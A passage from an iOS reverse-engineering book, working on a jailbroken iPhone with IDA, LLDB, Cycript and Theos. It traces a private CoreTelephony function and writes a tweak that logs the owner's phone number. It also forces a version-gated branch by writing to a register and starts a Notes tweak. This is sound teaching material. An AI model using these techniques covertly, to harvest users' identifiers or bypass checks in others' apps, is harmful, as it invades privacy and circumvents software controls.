function inside MobilePhoneSettings.bundle, we can ’t call it from outside this bundle. We ’re 
one step further, but not far enough. Let ’s continue by digging  into 
PhoneSettingsCopyMyNumber, as shown in figure 6 -44. 

 
236   
Figure 6- 44 PhoneSettingsCopyMyNumber  
This snippet first calls CTSettingCopyMyPhoneNumber and autoreleases the return value, 
then calls PhoneSettingsCopyFormattedNumberBySIMCountry, which seems to  format the 
phone number according to the country of the SIM card. Judging from the name and context, 
CTSettingCopyMyPhoneNumber looks like the target function we are looking for. And the 
prefix CT implies that it comes from CoreTelephony rather than Mobil ePhoneSettings. Double 
click this function to see its implementation, as shown in figure 6 -45. 
  
Figure 6- 45 CTSettingCopyMyPhoneNumber  
As expected, it’ s an external function. Double click 
“__imp__CTSettingCopyMyPhoneNumber ” to check out which library it originates from; it ’s 
exactly CoreTelephony. Quit Preferences and terminate it completely in the background, then 
relaunch it and don ’t enter MobilePhoneSettings. Now let ’s attach debugserver to it and take a 
look at its image list with LLDB, we will see CoreTelephony on the list. It means that we can call CTSettingCopyMyPhoneNumber to get my unformatted number without loading 
MobilePhoneSettings.bundle, which perfectly meets our requirements of a target function. 
Finally, the last question: what ’re its arguments and return value?  
Judging from figure 6 -44, CTSettingCopyMyPhoneNumber doesn ’t seem to have any 
argument; before CTSettingCopyMyPhoneNumber, R0~R3 don ’t even show at all. If it has any 
argument, then R0~R3 come from it s caller, i.e. PhoneSettingsCopyMyNumber. However, as 
we can see in figure 6 -43, before PhoneSettingsCopyMyNumber, only R0 occurs, and if it 

 
237 branches right, R0 is permanently 0, if R0 is an argument, it ’s meaningless. Therefore, 
PhoneSettingsCopyMyNumber d oesn’ t seem to have any argument either. To play it safe, let ’s 
reconfirm our guesses by checking the implementation of CTSettingCopyMyPhoneNumber in 
CoreTelephony, as shown in figure 6 -46. 
  
Figure 6- 46 CTSettingCopyMyPhoneNumber  
According to the naming c onventions of Objective- C functions, 
CTTelephonyCenterGetDefault is a getter and should return something; as a result, R0 under 
“BL _CTTelephonyCenterGetDefault ” is set to the return value of 
CTTelephonyCenterGetDefault. Meanwhile, at the bottom of figure 6-46, R1 is set to R4 in 
“MOV R1, R4 ”. If R0 and R1 are arguments, then they are useless, which doesn ’t make sense. 
Now we can say for sure that CTSettingCopyMyPhoneNumber has no argument. What about its return value? We naturally guess it ’s an NSString ob ject. Let ’s verify it by setting a breakpoint 
at the end of CTSettingCopyMyPhoneNumber, and print out R0. First locate to the end of CTSettingCopyMyPhoneNumber in IDA, as shown in figure 6 -47. 

 
238   
Figure 6- 47 CTSettingCopyMyPhoneNumber  
Then quit Preferences and terminate it completely in the background, then relaunch it and 
don’ t enter MobilePhoneSettings. Next attach debugserver to it and take a look at 
CoreTelephony ’s ASLR offset with LLDB:  
(lldb) image list - o -f 
[  0] 0x000b3000 
/private/var/db/stash/_.29 LMeZ/Applications/Preferences.app/Preferences(0x00000000000b70
00) 
[  1] 0x0026c000 /Library/MobileSubstrate/MobileSubstrate.dylib(0x000000000026c000)  
[  2] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/System/L ibrary/PrivateFrameworks/BulletinBoard.framework/BulletinBoard 
[ 51] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/System/Library/Frameworks/CoreTelephony.framework/CoreTelephony  
...... 
The breakpoint should be set at 0x6db3000 + 0x2226763A = 0x2901A63A, right? Then enter 
MobilePhoneSettings to trigger the breakpoint:  
(lldb) br s - a 0x2901A63A 
Breakpoint 1: where = CoreTelephony`CTSettingCopyMyPhoneNumber + 78, address = 
0x2901a63a  
Process 330210 stopped  
* thread  #1: tid = 0x509e2, 0x2901a63a CoreTelephony`CTSettingCopyMyPhoneNumber + 78, 
queue = ‘com.apple.main -thread, stop reason = breakpoint 1.1  
    frame #0: 0x2901a63a CoreTelephony`CTSettingCopyMyPhoneNumber + 78  
CoreTelephony`CTSettingCopyMyPhoneNumber + 78:  
-> 0x2901a63a:  add    sp, #28  
   0x2901a63c:  pop.w  {r8, r10, r11}  
   0x2901a640:  pop    {r4, r5, r6, r7, pc}  
   0x2901a642:  nop     
(lldb) po $r0  
+86PhoneNumber  
(lldb) po [$r0 class]  
__NSCFString  
It is indeed an NSString, so the prototype of this fu nction can be reconstructed:  
NSString *CTSettingCopyMyPhoneNumber(void);  
This is our target function, as well the data source of PSTableCell. We ’ve finally found it 
through analyzing the call chain of [PhoneSettingsController 
tableView:cellForRowAtIndexPath:], hurray! Just remember to release the return value when 
you make use of this function. At last, let ’s write a tweak to test this function.  
1.   Create tweak project “ iOSREGetMyNumber” using Theos: 
snakeninnys -MacBook:Code snak eninny$ /opt/theos/bin/nic.pl  

 
239 NIC 2.0 - New Instance Creator  
------------------------------  
  [1.] iphone/application  
  [2.] iphone/cydget  
  [3.] iphone/framework  
  [4.] iphone/library  
  [5.] iphone/notification_center_widget  
  [6.] iphone/preference_bundl e 
  [7.] iphone/sbsettingstoggle  
  [8.] iphone/tool  
  [9.] iphone/tweak  
  [10.] iphone/xpc_service  
Choose a Template (required): 9  
Project Name (required): iOSREGetMyNumber  
Package Name [com.yourcompany.iosregetmynumber]: com.iosre.iosregetmynumber  
Author/Maintainer Name [snakeninny]: snakeninny  
[iphone/tweak] MobileSubstrate Bundle filter [com.apple.springboard]: 
com.apple.Preferences  
[iphone/tweak] List of applications to terminate upon installation (space -separated, ‘ -’ 
for none) [SpringBoard]: Pr eferences  
Instantiating iphone/tweak in iosregetmynumber/...  
Done. 
2.   Edit Tweak.xm as follows: 
extern "C" NSString *CTSettingCopyMyPhoneNumber(void); // From CoreTelephony  
 
%hook PreferencesAppController  
- (BOOL)application:(id)arg1 didFinishLaunchingWithOp tions:(id)arg2  
{ 
 BOOL result = %orig;  
 NSLog(@"iOSRE: my number = %@", [CTSettingCopyMyPhoneNumber() autorelease]);  
 return result;  
} 
%end 
3.   Edit Makefile and control 
The finalized Makefile looks like this:  
export THEOS_DEVICE_IP = iOSIP 
export ARCHS = armv7 arm64 
export TARGET = iphone:clang:latest:8.0  
 
include theos/makefiles/common.mk  
 
TWEAK_NAME = iOSREGetMyNumber  
iOSREGetMyNumber_FILES = Tweak.xm  
iOSREGetMyNumber_FRAMEWORKS = CoreTelephony # CTSettingCopyMyPhoneNumber  is from here  
 
include $(THEOS_M AKE_PATH)/tweak.mk  
 
after-install::  
 install.exec "killall -9 Preferences"  
The finalized control looks like this:  
Package: com.iosre.iosregetmynumber  
 
240 Name: iOSREGetMyNumber  
Depends: mobilesubstrate, firmware (>= 8.0)  
Version: 1.0  
Architecture: iphoneos -arm 
Description: Get my number just like MobilePhoneSettings!  
Maintainer: snakeninny  
Author: snakeninny  
Section: Tweaks  
Homepage: http://bbs.iosre.com  
4.   Test 
Compile and install the tweak on iOS, then launch Preferences without entering 
MobilePhoneSettings. After that, ssh into iOS and take a look at the syslog:  
FunMaker- 5:~ root# grep iOSRE: /var/log/syslog 
Nov 29 23:23:01 FunMaker- 5 Preferences[2078]: iOSRE: my number = +86PhoneNumber  
5.   P.S. 
I have set the region of my iPhone 5 to US, so  
PhoneSettingsCopyFormattedNumberBySIMCountry has formatted my number from 
“+86PhoneNumber ” to “+86 Pho -neNu -mber ”, which is the American phone number format.  
You’ ll run into CTSettingCopyMyPhoneNumber more frequently as you reverse more. 
Actually, the prototype of CTSettingCopyMyPhoneNumber should be:  
CFStringRef CTSettingCopyMyPhoneNumber(void);  
Since NSString * and CFStringRef are toll -free bridged, our prototype is OK. 
Because there is a keyword “copy ” in the name of CTSettingCopyMyPhoneNumber and it 
returns a CoreData object, we are responsible to release the return value according to Apple ’s 
“Ownership Policy ”. 
In this section, we have shed considerable light to refine “locate target functions ” with A RM 
level reverse engineering and enhanced the methodology of writing a tweak. Specifically, we ’ve 
divided “locate target functions ” into 2 steps, i.e. “ cut into the target App and find the UI 
function ” and “ locate the target function from the UI function ”. By combining Cycript, IDA and 
LLDB, we have not only located the target functions, but also analyzed their arguments and 
return values to reconstruct their prototypes. The methodology we used in the examples can 
work on at least 95% of all Apps; however, if you unfortunately encounter those 5%, please 
share and discuss with us on http://bbs.iosre.com . 
 
241 6.3   Advanced LLDB usage  
I bet the last section has opened a new chapter of iOS reverse engineering for you. The 
combination  of IDA and LLDB can easily beat them all, and with the help of ARM architecture 
reference manual, you can conquer almost all Apps. I know you ’re already desperate to practice 
what you have just learned.  
Hold your horses for now. Although the examples in s ection 6.2 have synthetically made 
use of IDA and LLDB, they haven’ t covered LLDB’ s common usage yet. In the next section, 
we’ll go over some short LLDB examples for a better comprehension, which can greatly reduce 
our workload in practice.  
6.3.1   Look for a func tion ’s caller  
In the examples of the previous section, when we were restoring call chains, we primarily 
focused on the callees of a function, i.e. we ’ve restored the bottom half of a call chain. When 
we’re to restore the top half, we need to find out the caller of a function. Look at this snippet:  
// clang -arch armv7 -isysroot `xcrun --sdk iphoneos --show-sdk-path` -framework 
Foundation -o MainBinary main.m  
 
#include <stdio.h>  
#include <dlfcn.h>  
#import <Foundation/Foundation.h>  
 
extern void TestFunction0 (void) 
{ 
 NSLog(@"iOSRE: %u", arc4random_uniform(0));  
} 
 
extern void TestFunction1(void)  
{ 
 NSLog(@"iOSRE: %u", arc4random_uniform(1));  
} 
 
extern void TestFunction2(void)  
{ 
 NSLog(@"iOSRE: %u", arc4random_uniform(2));  
} 
 
extern void TestFunction3(void)  
{ 
 NSLog(@"iOSRE: %u", arc4random_uniform(3));  
} 
 
int main(int argc, char **argv)  
{ 
 TestFunction3();  
 return 0;  
} 
 
242 Save this snippet as a file named main.m, and compile it with the sentence in the comments. 
Drag and drop MainBinary into IDA, and then check the cross references of NSLog, as shown in 
figure 6 -48. 
  
Figure 6- 48 Check the cross references of NSLog  
As we can see, NSLog appears in 4 functions. If we see “ iOSRE: 0”  in syslog when we are 
reversing, how can we know which NSLog it ’s from? When there ’re only tens lines of code, we 
can figure out by hand that only TestFunction3 is called, and it further calls NSLog. What if 
there are 20 TestFunctions that are called by 8 separate functions? When the amount of code 
increases, it’ ll be too complicate to an alyze manually. If we want to find the caller of NSLog 
under such circumstances, LLBD will be very helpful. Generally, there are 2 main methods.  
•  Inspect LR 
Still remember LR register introduced in section 6.1? Its function is to save the return 
address of a function. So what ’s a return address? Take an example:  
void FunctionA()  
{ 
...... 
 FunctionB();  
...... 
} 
In the above pseudo code, FunctionA calls FunctionB, while A and B are located in 2 
different memory areas, and their addresses have no direct connection. After the execution of B, 
the process needs to go back to A to continue execution, as shown in figure 6 -49. 

 
243   
Figure 6- 49 An illustration of return address  
The address that the process returns to after the execution of FunctionB, is the return 
address, i.e . LR. Because it ’s inside FunctionB ’s caller, if we know the value of LR we can track 
to the caller. Let’ s explain this theory with an example. Drag and drop Foundation.framework ’s 
binary into IDA; locate to NSLog after the initial analysis, and check out its base address, as 
shown in figure 6 -50. 
  
Figure 6- 50 Check out NSLog ’s base address  
Its base address is 0x2261ab94, we will set a breakpoint on it shortly and print out the value 
of LR. Next, launch MainBinary with debugserver:  
FunMaker- 5:~ root# debugserver - x backboard *:1234 /var/tmp/MainBinary 
debugserver- @(#)PROGRAM:debugserver  PROJECT:debugserver -320.2.89 
 for armv7.  
Listening to port 1234 for a connection from *...  
Then connect with LLDB:  
(lldb) process connect connect://localhost:1234  
Process 450336 stopped  
* thread #1: tid = 0x6df20, 0x1fec7000 dyld`_dyld_start, stop reason = signal SIGSTOP  
    frame #0: 0x1fec7000 dyld`_dyld_start  

 
244 dyld`_dyld_start:  
-> 0x1fec7000:  mov    r8, sp  
   0x1fec7004:  sub    sp, sp, #16  
   0x1fec7008:  bic    sp, sp, #7  
   0x1fec700c:  ldr    r3, [pc, #112]            ; _dyld_start + 132  
(lldb) image list -f 
[  0] /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/usr/lib/dyld  
Right at this moment, MainBinar y is not run yet, and we are inside dyld. Next, keep 
entering “ ni” until LLDB outputs “error: invalid thread ”: 
(lldb) ni  
Process 450336 stopped  
* thread #1: tid = 0x6df20, 0x1fec7004 dyld`_dyld_start + 4, stop reason = instruction 
step over  
    frame #0: 0 x1fec7004 dyld`_dyld_start + 4  
dyld`_dyld_start + 4:  
-> 0x1fec7004:  sub    sp, sp, #16  
   0x1fec7008:  bic    sp, sp, #7  
   0x1fec700c:  ldr    r3, [pc, #112]            ; _dyld_start + 132  
   0x1fec7010:  sub    r0, pc, #8  
(lldb)  
Process 450336 stopped  
* thread #1: tid = 0x6df20, 0x1fec7008 dyld`_dyld_start + 8, stop reason = instruction 
step over  
    frame #0: 0x1fec7008 dyld`_dyld_start + 8  
dyld`_dyld_start + 8:  
-> 0x1fec7008:  bic    sp, sp, #7  
   0x1fec700c:  ldr    r3, [pc, #112]            ; _dyld_ start + 132  
   0x1fec7010:  sub    r0, pc, #8  
   0x1fec7014:  ldr    r3, [r0, r3]  
...... 
(lldb)  
error: invalid thread  
No more “ ni” when the error occurs; now dyld begins to load MainBinary. Wait a moment, 
the process will stop again, and we are inside MainBinary, it ’s okay to debug  then : 
Process 450336 stopped  
* thread #1: tid = 0x6df20, 0x1fec7040 dyld`_dyld_start + 64, queue = ‘com .apple.main -
thread, stop reason = instruction step over  
    frame #0: 0x1fec7040 dyld`_dyld_start + 64  
dyld`_dyld_start + 64:  
-> 0x1fec7040:  ldr    r5, [sp, #12]  
   0x1fec7044:  cmp    r5, #0  
   0x1fec7048:  bne    0x1fec7054                ; _dyld_start + 84 
   0x1fec704c:  add    sp, r8, #4  
Check out ASLR offset of Foundation.framework:  
(lldb) image list -o -f 
[  0] 0x000fc000 /private/var/tmp/MainBinary(0x0000000000100000)  
[  1] 0x000c6000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1  
(12B411)/Symbols/usr/lib/dyld  
[  2] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/System/Library/Frameworks/Foundation.framework/Foundation  
...... 
 
245 As usual, we should set the breakpoint at 0x6db3000 + 0x2261ab94 = 0x293CDB94. Execute 
“c” to trigger the breakpoint:  
(lldb) br s -a 0x293CDB94  
Breakpoint 1: where = Foundation`NSLog, address = 0x293cdb94  
(lldb) c  
Process 450336 resuming  
Process 450336 sto pped 
* thread #1: tid = 0x6df20, 0x293cdb94 Foundation`NSLog, queue = ‘com.apple.main -thread, 
stop reason = breakpoint 1.1  
    frame #0: 0x293cdb94 Foundation`NSLog  
Foundation`NSLog:  
-> 0x293cdb94:  sub    sp, #12  
   0x293cdb96:  push   {r7, lr}  
   0x293cdb98:  mov    r7, sp  
   0x293cdb9a:  sub    sp, #4  
Print out LR: 
(lldb) p/x $lr 
(unsigned int) $0 = 0x00107f8d 
Because the base address of MainBinary is 0x000fc000, open MainBinary in IDA and jump to 
0x107f8d -  0xfc000 = 0xBF8D, as shown in figure 6 -51. 
  
Figure 6- 51 TestFunction3  
0xBF8D is right below “BLX _NSLog ”, so we have found the caller of NSLog. One thing 
should be noted is that because LR may change in the caller, the breakpoint should be set at the 
base address. Pretty easy, huh?  
•  Execute “ni” to get inside caller 
Although “Inspect LR ” is straightforward enough, we ’ve played a trick: because we ’ve 
already known NSLog is called inside MainBinary, we ’ve subtracted MainBinary’ s ASLR offset 
from LR to get the final result. But in more g eneral cases, we don ’t know which function calls 
NSLog, not to mention which image calls NSLog, so we don ’t know whose ASLR offset should 
be subtracted from LR. To solve this problem, our theoretical base is still “After the execution of 
B, the process needs to go back to A to continue execution ”; if we set a breakpoint at the end of 

 
246 the callee and keep executing “ ni”, we will come back to the caller. Let ’s take another example: 
repeat the steps in last section to check out ASLR offset of Foundation.framewo rk in 
MainBinary:  
(lldb) image list - o -f 
[  0] 0x0000c000 /private/var/tmp/MainBinary(0x0000000000010000)  
[  1] 0x000c5000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/usr/lib/dyld  
[  2] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/System/Library/Frameworks/Foundation.framework/Foundation  
...... 
Its ASLR offset is 0x6db3000. According to figure 6 -50, the address of the last instruction of 
NSLog is 0x2261ABB6, so set a breakpoint at 0x6db3000 + 0x2261ABB6 = 0x293CDBB6, then 
enter “c” to trigger the breakpoint:  
(lldb) br s -a 0x293CDBB6  
Breakpoint 1 : where = Foundation`NSLog + 34, address = 0x293cdbb6  
(lldb) c  
Process 452269 resuming  
(lldb) 2014 -11-30 23:45:37.070 MainBinary[3454:452269] iOSRE: 1  
Process 452269 stopped  
* thread #1: tid = 0x6e6ad, 0x293cdbb6 Foundation`NSLog + 34, queue = ‘com.apple.m ain-
thread, stop reason = breakpoint 1.1  
    frame #0: 0x293cdbb6 Foundation`NSLog + 34  
Foundation`NSLog + 34:  
-> 0x293cdbb6:  bx     lr  
 
Foundation`NSLogv:  
   0x293cdbb8:  push   {r4, r5, r6, r7, lr}  
   0x293cdbba:  add    r7, sp, #12  
   0x293cdbbc:  sub    sp, #12 
Notice the texts above “->“, it implies the present image. Keep executing “ni”: 
(lldb) ni  
Process 452269 stopped  
* thread #1: tid = 0x6e6ad, 0x00017fa6 MainBinary`main + 22, queue = ‘com.apple.main -
thread, stop reason = instruction step over  
    frame #0: 0x00017fa6 MainBinary`main + 22  
MainBinary`main + 22:  
-> 0x17fa6:  movs   r0, #0  
   0x17fa8:  movt   r0, #0  
   0x17fac:  add    sp, #12  
   0x17fae:  pop    {r7, pc}  
Here comes MainBinary and the process stops at 0x17fa6. 0x17fa6 – 0xc000 = 0xbfa6, so 
again, we have found NSLog ’s caller TestFunction3 according to figure 6 -51. 
Both methods are simple and direct; choose whatever you like.  
 
247 6.3.2    Change process execution flow  
Why do we need to change process execution flow? Commonly it ’s because the code we 
want to debug could only be executed in specific conditions, which are hard to meet in the 
original execution flow. Under such circumstances, we have to change the flow to redirect the 
process to execute the target code for debugging. Reads awkward ? Let’ s see an example. 
// clang - arch armv7 - isysroot `xcrun --sdk iphoneos --show- sdk-path` -framework 
Foundation - framework UIKit - o MainBinary main.m 
 
#include <stdio.h>  
#include <dlfcn.h>  
#import <Foundation/Foundation.h>  
#import <UIKit/UIKit.h>  
 
extern void ImportantAndComplicatedFunction(void)  
{ 
 NSLog(@"iOSRE: Suppose I'm a very important and complicated function");  
} 
 
int main(int argc, char **argv)  
{ 
 if ([[[UIDevice currentDevice] systemVersion] isEqualToString:@"8.1.1"]) 
ImportantAndComplicatedF unction();  
 return 0;  
} 
Save this snippet as main.m, and compile it with the sentence in the comments, then copy 
MainBinary to “/var/tmp/”  on iOS:  
snakeninnys- MacBook:6 snakeninny$ scp MainBinary root@iOSIP:/var/tmp/  
MainBinary                                                           100%   49KB  
48.6KB/s   00:00     
Run it:  
FunMaker -5:~ root# /var/tmp/MainBinary  
FunMaker -5:~ root#  
Because I ’m using iOS 8.1, there is no output for sure. What if I am interested in 
ImportantAndComplicatedFunction but don ’t have iOS 8.1.1 in hand? Then I have to 
dynamically change the execution flow to make this function get called. I ’ll show you how, 
please keep focused. Drag and drop MainBinary into IDA, then locate to the branch bef ore 
ImportantAndComplicatedFunction, as shown in figure 6 -52. 
 
248   
Figure 6- 52 Before ImportantAndComplicatedFunction  
Repeat the previous steps to check out MainBinary ’s ASLR offset:  
(lldb) image list -o -f 
[  0] 0x0000e000 /private/var/tmp/MainBinary(0x0000000000012000)  
...... 
Because the address of “CMP R0, #0 ” in figure 6- 52 is 0xBF46, the breakpoint should be set 
at 0xbf46 + 0xe000 = 0x19F46. Trigger it with “c”, and print R0:  
(lldb) br s - a 0x19F46 
Breakpoint 1: where = MainBinary`main + 134, address = 0x00019f46 
(lldb) c  
Process 456316 resuming  
Process 456316 stopped  
* thread #1: tid = 0x6f67c, 0x00019f46 MainBinary`main + 134, queue = ‘com.apple.main -
thread, stop reason = breakpoint 1.1  
    frame #0: 0x00019f46 MainBinary`main + 134  
MainBinary`main + 134:  
-> 0x19f46:  cmp    r0, #0  
   0x19f48:  beq    0x19f4e                   ; main + 142  
   0x19f4a:  bl     0x19ea4                   ; ImportantAndComplicatedFunction  
   0x19f4e:  movs   r0, #0 
(lldb) p $r0  
(unsigned int) $0 = 0  
R0 is 0, so ImportantAndComplicatedFunction will not be executed. If we change R0 to 1, 
the situation changes all together:  
(lldb) register write r0 1 
(lldb) p $r0 
(unsigned int) $1 = 1  
(lldb) c  
Process 456316 resuming  
(lldb) 2014 -12-01 00:41:47.779 MainBinary[3482:457105] iOSRE: Suppose I’m a very 
important and complicated function  
Process 456316 exited with status = 0 (0x00000000)  
As we can see, we ’ve changed the process execution flow by modifying the value  of a 
register, thus achieved our goal.  

 
249 6.4   Conclusion 
The combination of IDA and LLDB is far more powerful than what we have introduced in 
this chapter, their usage ranges from App analysis to jailbreak, showing their omnipotence. 
Nonetheless, in the beginnin g stage of iOS reverse engineering, their usage is not likely to 
exceed the scope of this book. As soon as you can use them proficiently, your understanding of 
iOS would rise to a new level and you ’ll be able to summarize your own methodologies. 
There ’re still lots and lots of topics in ARM related iOS reverse engineering to further explore, 
and we ’re unable to cover them all in one book. Therefore, we will leave them to 
http://bbs.iosre.com , please stay focused.  
To be h onest, this chapter is rather difficult to understand, but this is the only path to be a 
real iOS reverse engineer. In part 4 of this book, we will turn methodologies in part 3 into 
practices and write 4 tweaks. I hope you know from the bottom of your hear t whether you are 
talented enough to be an iOS reverse engineer after finishing all 4 practices. As Steve Jobs said, “It’s more fun to be a pirate than to join the Navy ”. IMHO, being an iOS reverse engineer is way 
more fun than being just an App developer, but after all, it ’s up to you. Good luck!  
  
 
250  
Practices 
 
 
The first 3 parts of this book have introduced the concepts, tools and theories of iOS reverse 
engineering, along with examples to give you a better understanding of them. I believe you 
have the same feeling that only if concepts, tools and theories are combined together can we get 
the best out reverse engineering.  
So far, you may still feel unsatisfied with the fragmented and conservative examples. So in 
this part, we’ ve prepared 4 origi nal and serialized examples to show you the combination of 
concepts, tools and theories. They are:  
•  Characount for Notes 8 
•  Mark user specific emails as read automatically  
•  Save and share Sight in WeChat 
•  Detect and send iMessage 
Now, welcome to the most spl endid  part of this book. Let ’s enjoy the art of iOS reverse 
engineering!  
  
IV 
  
 
251  
Practice 1: Characount for Notes 8  
 
 
7.1   Notes  
I bet Notes App (hereafter referred to as Notes) is one of your most familiar iOS Apps. Its UI 
and functionality have experienced very few changes since iOS came out. The simplicity and 
convenience of Notes win my heart, all my secrets are sealed in it, as shown in figure 7 -1.  
 
Figure 7-  1 Notes  
Being a power user of Notes, not only do I save secrets in it, but also compose SMS or 
tweets in it. Since there is word limit on SMS and tweets, I really wish Notes can display each 
note’ s character count as a reminder. DIY is a born spirit of reverse engineers, so I ’ve developed 
Characount for Notes, which is one of my daily necessities on iOS 6. It ’s not a difficult tweak, 
hence can be a stepping -stone for beginners like you. Our goal in this chapter is to rewrite 
7 
  
 
252 Characount for Notes on iOS 8, and all the following operations are performed on iPhone 5, iOS 
8.1. 
7.2   Tweak prototyping  
On iOS 8, the original note browsing view looks like figure 7 -2. 
 
Figure 7-  2 Note browsing view on iOS 8  
If we’ re to choose a place to display the character count of this note, where do you think 
looks better? If you used to be an iOS 6 user, do you remember that each note has a centered 
title as shown in figure 7 -3? 

 
253  
Figure 7-  3 Note browsing view on iOS 6  
However, Notes on iOS 8 has removed the title, leaving a blank navigation bar. Why don ’t 
we just display the character count here, as shown in figure 7 -4? 

 
254  
Figure 7-  4 Note browsing view with a title  
It looks good! So, what exactly should we do to make Notes look like this? Hope you 
remember the saying in chapter 5 that everything you see on iOS is an object. Keep that in  mind 
and think with me:  
Every note is an object, and note browsing view contains the content and modification time 
of a note object. Since note browsing view is a subclass of UIView, we can trace back to its view 
controller via nextResponder, and further access all note concerned data via its view controller 
according to MVC design pattern. With the note data, we can initialize the character count when this view appears.  
While we are editing a note, a “Done”  button will appear on the right side of the navi gation 
bar, as shown in figure 7- 5.  

 
255  
Figure 7-  5 “Done”  button  
After tapping “Done” , the current note is saved. This phenomenon indicates that a note is 
not saved in real time during editing, or we just don ’t need this button at all. Of course, 
character count changes instantly with the editing content would be the ideal visual effect, so to 
accomplish this goal, we need to find a specific method which monitors the changes of the 
current note. In addition, we  should be able to get the character count of this note and update 
the title just in time within this method. Because this kind of methods are usually defined in protocols, we should keep an eye on protocols in Notes.  
Suppose we can get the current note ’s character count, how do we put it on the navigation 
bar? Usually, the note browsing view controller inherits from UIVi ewController, which 
possesses a  “title”  property. So, “setTitle: ” is the answer.  
If we managed to solve these 3 problems, there ’ll be no more technical difficulties for 
Characount for Notes. Code speaks louder than words, let ’s move it!  
7.2.1   Locate Notes ’ executable 
There ’s no Notes.app under /Applications/ at all. Besides searching blindly, what else can 
we do to locate its executable? Do you still remember the trick of getting an App ’s path in 

 
256 dumpdecrypted section? Yeah, it’ s ps command again: first close all Apps, then open Notes and 
ssh to iOS to list all system processes with ps:  
FunMaker -5:~ root# ps -e | grep /Applications/  
  592 ??         0:37.70 /Applications/MobileMail.app/MobileMail  
  761 ??         0:02.78 
/Applications/MessagesNotificationViewService.app/MessagesNotificationViewService  
 1807 ??         0:00.55 
/private/var/db/stash/_.29LMeZ/Applications/MobileSafari.app/webbookmarksd  
 2016 ??         0:05.23 /Applications/InCallService.app/InCallService  
 2619 ??         0:02.66 /Applications/MobileSMS.app/MobileSMS  
 2672 ??         0:01.20 /Applications/MobileNotes.app/MobileNotes  
 2678 ttys000    0:00.01 grep /Applications/  
Among those processes, MobileNotes attracts us most. How to verify our guess? We can 
simply kill it and see whether Notes quit.  
FunMaker -5:~ root# killall MobileNote s 
Notes has quit as we expected, which clearly means that 
“/Applications/MobileNotes.app/MobileNotes ” is Notes’  executable. Meanwhile, we ’ve 
discovered some Apps that ’re running in the background. Copy MobileNotes to OSX and get 
ready to class -dump it.  
7.2.2   class-dump MobileNotes ’ headers 
Because Notes is a stock App, its executable is not encrypted, enabling us to class -dump it 
directly:  
snakeninnys -MacBook:~  snakeninny$  class-dump -S -s -H 
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5/MobileNotes.app/MobileNotes  -o 
/Users/snakeninny/Code/iOSPrivateHeaders/8.1/MobileNotes   
We’ve got 88 headers in total. Let ’s take a brief look to s ee what we can discover, as shown 
in figure 7- 6. 
 
Figure 7-  6 Headers of Notes  
Do you see the selected file in figure 7 -6? I am not sure if it is a key clue of this chapter for 
now, but we ’ll see.  

 
257 7.2.3   Find the controller of note browsing view using Cycript  
Again, recursiveDescription makes our days: 
FunMaker -5:~ root# cycript -p MobileNotes  
cy# ?expand 
expand == true 
cy# [[UIApp keyWindow]  recursiveDescription]  
@"<UIWindow:  0x17688db0;  frame = (0 0; 320 568); gestureRecognizers  = <NSArray:  
0x17689620>;  layer = <UIWindowLayer:  0x17688fc0>>  
   | <UILayoutContainerView:  0x175bb880;  frame = (0 0; 320 568); autoresize  = W+H; layer 
= <CALayer:  0x175bb900>>  
   |    | <UILayoutContainerView:  0x17699350;  frame = (0 0; 320 568); clipsToBounds  = 
YES; gestureRecognizers  = <NSArray:  0x1769cf60>;  layer = <CALayer:  0x17699530>>  
   |    |    | <UINavigationTransitionView:  0x176564c0;  frame = (0 0; 320 568); 
clipsToBounds  = YES; autoresize  = W+H; layer = <CALayer:  0x17658ec0>>  
   |    |    |    | <UIViewControllerWrapperView:  0x176d13b0;  frame = (0 0; 320 568); 
layer = <CALayer:  0x176d1530>>  
   |    |    |    |    | <UILayoutContainerView:  0x1769dd80;  frame = (0 0; 320 568); 
clipsToBounds  = YES; gestureRecognizers  = <NSArray:  0x176a16f0>;  layer = <CALayer:  
0x1769de00>>  
   |    |    |    |    |    | <UINavigationTransitionView:  0x1769ebb0;  frame = (0 0; 320 
568); clipsToBounds  = YES; autoresize  = W+H; layer = <CALayer:  0x1769ec40>>  
   |    |    |    |    |    |    | <UIViewControllerWrapperView:  0x175109e0;  frame = (0 
0; 320 568); layer = <CALayer:  0x175109b0>>  
   |    |    |    |    |    |    |    | <NotesBackgroundView:  0x175ee3e0;  frame = (0 0; 
320 568); gestureRecognizers  = <NSArray:  0x17510a70>;  layer = <CALayer:  0x175ee580>>  
   |    |    |    |    |    |    |    |    | <NotesTextureBackgroundView:  0x175ee5b0;  
frame = (0 0; 320 568); clipsToBounds  = YES; layer = <CALayer:  0x175ee630>>  
   |    |    |    |    |    |    |    |    |    | <NotesTextureView:  0x175ee940;  frame = 
(0 -64; 320 640); layer = <CALayer:  0x175ee9c0>>  
   |    |    |    |    |    |    |    |    | <NoteContentLayer:  0x176c5110;  frame = (0 
0; 320 568); layer = <CALayer:  0x176ca850>>  
   |    |    |    |    |    |    |    |    |    | <UIView:  0x175f2130;  frame = (16 0; 
288 0); hidden = YES; layer = <CALayer:  0x175dd2b0>> 
   |    |    |    |    |    |    |    |    |    | <NotesScrollView:  0x175f2a10;  
baseClass  = UIScrollView;  frame = (0 0; 320 568); clipsToBounds  = YES; 
gestureRecognizers  = <NSArray:  0x175f1b70>;  layer = <CALayer:  0x175f28d0>;  
contentOffset:  {0, -64}; contentSize:  {320, 460}> 
   |    |    |    |    |    |    |    |    |    |    | <UIView:  0x175f09a0;  frame = (0 
0; 320 0); layer = <CALayer:  0x175f2790>>  
   |    |    |    |    |    |    |    |    |    |    | <UIView:  0x175f27e0;  frame = (0 
0; 0 460); layer = <CALayer:  0x175f2850>>  
   |    |    |    |    |    |    |    |    |    |    | <NoteDateLabel:  0x175f3400;  
baseClass  = UILabel;  frame = (69 5.5; 182 18); text = 'November  24, 2014, 20:44'; 
userInteractionEnabled  = NO; layer = <_UILabelLayer:  0x175f35 60>> 
